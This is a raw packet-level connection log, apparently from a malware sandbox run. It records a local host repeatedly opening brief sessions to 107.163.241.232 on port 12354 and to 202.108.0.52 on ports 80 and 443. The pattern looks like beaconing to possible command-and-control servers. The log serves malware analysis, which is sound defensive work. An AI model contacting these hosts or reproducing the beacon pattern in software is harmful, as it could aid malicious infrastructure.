Dec 11, 2024 16:30:20.824593067 CET	52201	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:20.896193981 CET	12354	52198	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:20.948194027 CET	80	52201	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:22.359360933 CET	80	52201	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:22.359441996 CET	52201	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:22.381954908 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:22.382014990 CET	443	53382	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:22.382092953 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:22.382678032 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:22.382692099 CET	443	53382	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:22.746459007 CET	12354	52158	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:22.746541977 CET	52158	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.775943995 CET	52158	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.777249098 CET	53724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.884754896 CET	12354	52198	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:22.884824991 CET	52198	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.885330915 CET	52198	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.895303965 CET	12354	52158	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:22.896666050 CET	12354	53724	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:22.896734953 CET	53724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.898128033 CET	53724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:22.902283907 CET	53837	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:23.015383005 CET	12354	52198	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:23.021989107 CET	12354	53724	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:23.022007942 CET	12354	53837	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:23.022149086 CET	53837	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:23.032658100 CET	53837	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:23.152743101 CET	12354	53837	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:24.086488962 CET	443	53382	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:24.086608887 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.087277889 CET	443	53382	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:24.087340117 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.270759106 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.270874977 CET	443	53382	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:24.270962954 CET	53382	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.761095047 CET	53724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:24.761215925 CET	53837	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:24.801249981 CET	54347	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:24.823168039 CET	52201	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.823673010 CET	54349	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.920814037 CET	12354	54347	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:24.920907974 CET	54347	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:24.942987919 CET	80	54349	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:24.943048954 CET	80	52201	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:24.943061113 CET	54349	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.943099022 CET	52201	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.969530106 CET	54347	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:24.970639944 CET	54349	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:24.982683897 CET	54354	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:25.090300083 CET	12354	54347	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:25.090312004 CET	80	54349	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:25.104057074 CET	12354	54354	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:25.104120016 CET	54354	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:25.168068886 CET	54354	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:25.288095951 CET	12354	54354	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:26.523355007 CET	80	54349	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:26.526400089 CET	54349	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:26.549696922 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:26.549752951 CET	443	55599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:26.549868107 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:26.550188065 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:26.550201893 CET	443	55599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:27.035291910 CET	12354	54347	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.035376072 CET	54347	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.035892963 CET	54347	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.036309004 CET	56039	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.155086994 CET	12354	54347	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.155498981 CET	12354	56039	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.155581951 CET	56039	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.155894995 CET	56039	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.224203110 CET	12354	54354	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.224334955 CET	54354	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.224678040 CET	54354	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.225431919 CET	56201	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.276374102 CET	12354	56039	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.344331980 CET	12354	54354	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.344773054 CET	12354	56201	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:27.344875097 CET	56201	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.346025944 CET	56201	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:27.467479944 CET	12354	56201	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:28.237152100 CET	443	55599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:28.238482952 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.238502026 CET	443	55599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:28.239844084 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.497912884 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.498019934 CET	443	55599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:28.498079062 CET	55599	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.756853104 CET	54349	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.757324934 CET	56250	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.816772938 CET	56201	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:28.816907883 CET	56039	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:28.868196964 CET	56252	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:28.877067089 CET	80	56250	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:28.877116919 CET	80	54349	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:28.877145052 CET	56250	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.877283096 CET	54349	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:28.987751007 CET	12354	56252	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:28.987889051 CET	56252	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:29.026573896 CET	56252	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:29.039328098 CET	56254	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:29.146039009 CET	12354	56252	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:29.159796000 CET	12354	56254	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:29.159876108 CET	56254	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:29.160989046 CET	56254	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:29.280514002 CET	12354	56254	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:29.748209000 CET	56753	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:29.867649078 CET	80	56753	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:29.867736101 CET	56753	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:29.868357897 CET	56753	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:29.987935066 CET	80	56753	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:31.115375042 CET	12354	56252	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:31.115603924 CET	56252	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.122060061 CET	56252	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.122535944 CET	58073	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.241581917 CET	12354	56252	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:31.241974115 CET	12354	58073	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:31.242058992 CET	58073	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.251080036 CET	58073	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.287457943 CET	12354	56254	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:31.287858963 CET	56254	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.290086985 CET	56254	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:31.370865107 CET	12354	58073	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:31.410643101 CET	12354	56254	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:31.440895081 CET	80	56753	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:31.440962076 CET	56753	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:32.611618042 CET	58088	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:32.611656904 CET	443	58088	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:32.611749887 CET	58088	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:32.623250961 CET	58090	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:32.669066906 CET	58088	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:32.669146061 CET	443	58088	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:32.744844913 CET	12354	58090	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:32.744961023 CET	58090	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:32.840070963 CET	58090	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:32.959630966 CET	12354	58090	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:33.039346933 CET	58088	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:33.039388895 CET	58090	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.039416075 CET	58073	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.040806055 CET	58146	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.162153006 CET	12354	58146	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:33.162563086 CET	58146	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.176525116 CET	58146	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.186922073 CET	56753	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:33.187267065 CET	58152	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:33.216408014 CET	58153	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.296022892 CET	12354	58146	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:33.306889057 CET	80	58152	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:33.306901932 CET	80	56753	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:33.307014942 CET	56753	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:33.307426929 CET	58152	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:33.308235884 CET	58152	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:33.336077929 CET	12354	58153	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:33.336158991 CET	58153	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.336395025 CET	58153	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:33.429641008 CET	80	58152	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:33.455739975 CET	12354	58153	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:34.871282101 CET	80	58152	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:34.871367931 CET	58152	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:34.915283918 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:34.915354967 CET	443	59372	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:34.915430069 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:34.935210943 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:34.935266018 CET	443	59372	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:35.287168026 CET	12354	58146	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:35.287286997 CET	58146	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.459425926 CET	12354	58153	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:35.459631920 CET	58153	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.493396997 CET	58146	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.493999958 CET	59396	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.615447998 CET	12354	58146	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:35.616174936 CET	12354	59396	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:35.616308928 CET	59396	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.740700006 CET	58153	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.747033119 CET	59396	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:35.860327005 CET	12354	58153	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:35.866394043 CET	12354	59396	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:36.159799099 CET	59400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:36.280286074 CET	12354	59400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:36.280596018 CET	59400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:36.351914883 CET	59400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:36.471467972 CET	12354	59400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:36.647063971 CET	443	59372	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:36.647164106 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.649760962 CET	443	59372	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:36.649822950 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.666234016 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.666429996 CET	443	59372	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:36.666511059 CET	59372	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.813168049 CET	58152	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.813644886 CET	59589	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.933281898 CET	80	59589	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:36.933296919 CET	80	58152	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:36.933388948 CET	58152	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.933455944 CET	59589	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:36.934578896 CET	59589	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:37.054115057 CET	80	59589	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:37.179447889 CET	59396	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.179512024 CET	59400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.179578066 CET	59589	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:37.181278944 CET	59732	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.295011044 CET	59839	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.295634031 CET	59840	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:37.301568985 CET	12354	59732	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:37.301680088 CET	59732	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.302042007 CET	59732	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.414990902 CET	12354	59839	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:37.415064096 CET	59839	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.415388107 CET	80	59840	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:37.415510893 CET	59840	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:37.415810108 CET	59839	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:37.416140079 CET	59840	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:37.421585083 CET	12354	59732	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:37.535573006 CET	12354	59839	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:37.535701036 CET	80	59840	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:38.981940031 CET	80	59840	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:38.982105970 CET	59840	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:39.428107023 CET	12354	59732	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:39.430246115 CET	59732	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.521601915 CET	12354	59839	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:39.521702051 CET	59839	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.708551884 CET	59732	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.709044933 CET	59839	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.764425039 CET	61066	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.830415010 CET	12354	59732	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:39.830770016 CET	12354	59839	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:39.889991045 CET	12354	61066	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:39.890211105 CET	61066	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.911413908 CET	61066	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:39.975188017 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:39.975243092 CET	443	61079	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:39.975321054 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:40.037578106 CET	12354	61066	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:40.039921045 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:40.039957047 CET	443	61079	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:40.185887098 CET	61081	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:40.305398941 CET	12354	61081	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:40.305510044 CET	61081	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:40.308815002 CET	61081	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:40.429915905 CET	12354	61081	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:41.736414909 CET	443	61079	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:41.736505985 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:41.739089012 CET	443	61079	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:41.739159107 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:41.742680073 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:41.742758989 CET	443	61079	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:41.742907047 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:41.742908001 CET	443	61079	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:41.742979050 CET	61079	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:41.987550974 CET	59840	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:41.987843037 CET	62622	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:42.022418022 CET	12354	61066	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.022481918 CET	61066	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.022783041 CET	61066	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.023211002 CET	62665	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.107542992 CET	80	62622	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:42.107655048 CET	62622	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:42.108114004 CET	80	59840	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:42.108170986 CET	62622	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:42.108191013 CET	59840	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:42.142293930 CET	12354	61066	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.142642975 CET	12354	62665	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.142853022 CET	62665	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.142997980 CET	62665	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.227456093 CET	80	62622	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:42.262351990 CET	12354	62665	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.423430920 CET	12354	61081	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.423645020 CET	61081	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.423873901 CET	61081	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.424572945 CET	62888	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.544380903 CET	12354	61081	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.545377016 CET	12354	62888	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:42.545492887 CET	62888	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.550636053 CET	62888	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:42.671242952 CET	12354	62888	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:43.675426960 CET	80	62622	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:43.675740004 CET	62622	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:43.849498034 CET	63755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:43.849554062 CET	443	63755	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:43.849771976 CET	63755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:43.850756884 CET	63755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:43.850776911 CET	443	63755	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:43.944746971 CET	63755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:43.944860935 CET	62888	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:43.944873095 CET	62665	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:43.949012995 CET	63787	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:44.058288097 CET	63901	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:44.058676004 CET	62622	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:44.059142113 CET	63902	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:44.068495035 CET	12354	63787	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:44.068599939 CET	63787	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:44.069386005 CET	63787	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:44.177726030 CET	12354	63901	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:44.178071022 CET	63901	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:44.178217888 CET	63901	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:44.178493977 CET	80	63902	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:44.178540945 CET	80	62622	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:44.178550959 CET	63902	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:44.178597927 CET	62622	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:44.179049015 CET	63902	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:44.188693047 CET	12354	63787	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:44.297528028 CET	12354	63901	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:44.298476934 CET	80	63902	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:45.730695963 CET	80	63902	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:45.731053114 CET	63902	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:45.767837048 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:45.767882109 CET	443	65482	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:45.767951965 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:45.769059896 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:45.769073009 CET	443	65482	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:46.178210974 CET	12354	63787	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.178271055 CET	63787	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.179131985 CET	63787	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.179599047 CET	49405	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.287239075 CET	12354	63901	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.287300110 CET	63901	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.287442923 CET	63901	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.295805931 CET	49512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.299057007 CET	12354	63787	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.299550056 CET	12354	49405	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.299619913 CET	49405	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.299801111 CET	49405	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.406826973 CET	12354	63901	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.415280104 CET	12354	49512	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.416187048 CET	49512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.416380882 CET	49512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:30:46.419296026 CET	12354	49405	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:46.536411047 CET	12354	49512	107.163.241.232	192.168.2.7
Dec 11, 2024 16:30:47.488060951 CET	443	65482	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:47.488142967 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.488996029 CET	443	65482	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:47.489033937 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.499460936 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.499629974 CET	443	65482	202.108.0.52	192.168.2.7
Dec 11, 2024 16:30:47.499713898 CET	65482	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.604737997 CET	63902	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:30:47.605117083 CET	50781	80	192.168.2.7	202.108.0.52
